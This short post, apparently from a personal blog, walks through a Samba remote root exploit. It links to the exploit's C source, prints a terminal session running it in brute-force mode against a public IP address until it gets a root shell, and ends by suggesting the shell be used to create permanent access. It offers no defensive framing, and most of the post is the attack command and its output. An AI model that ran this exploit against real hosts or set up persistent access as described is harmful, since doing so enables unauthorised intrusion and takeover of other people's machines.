Linux penetration #1: Samba

http://base.fujang.dk/files/mike/sambal.c
Taken from: http://www.greyhat.org/exploits/2003/april/sambal.c

peanut# ./sambal -b 0 -v 80.196.128.94
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
————————————————————–
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Recieved a non session message
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Recieved a non session message
+ Recieved a non session message
+ Worked!
————————————————————–
*** JE MOET JE MUIL HOUWE
Linux ricecrispy 2.4.20 #2 Mon Mar 17 22:02:15 PST 2003 i686 unknown
uid=0(root) gid=0(root) groups=99(nogroup),98(nobody)

Now you have a ghost shell: you can type commands and send keystrokes to it, but it won't act like a regular terminal. It is enough, though, for creating a permanent way in.
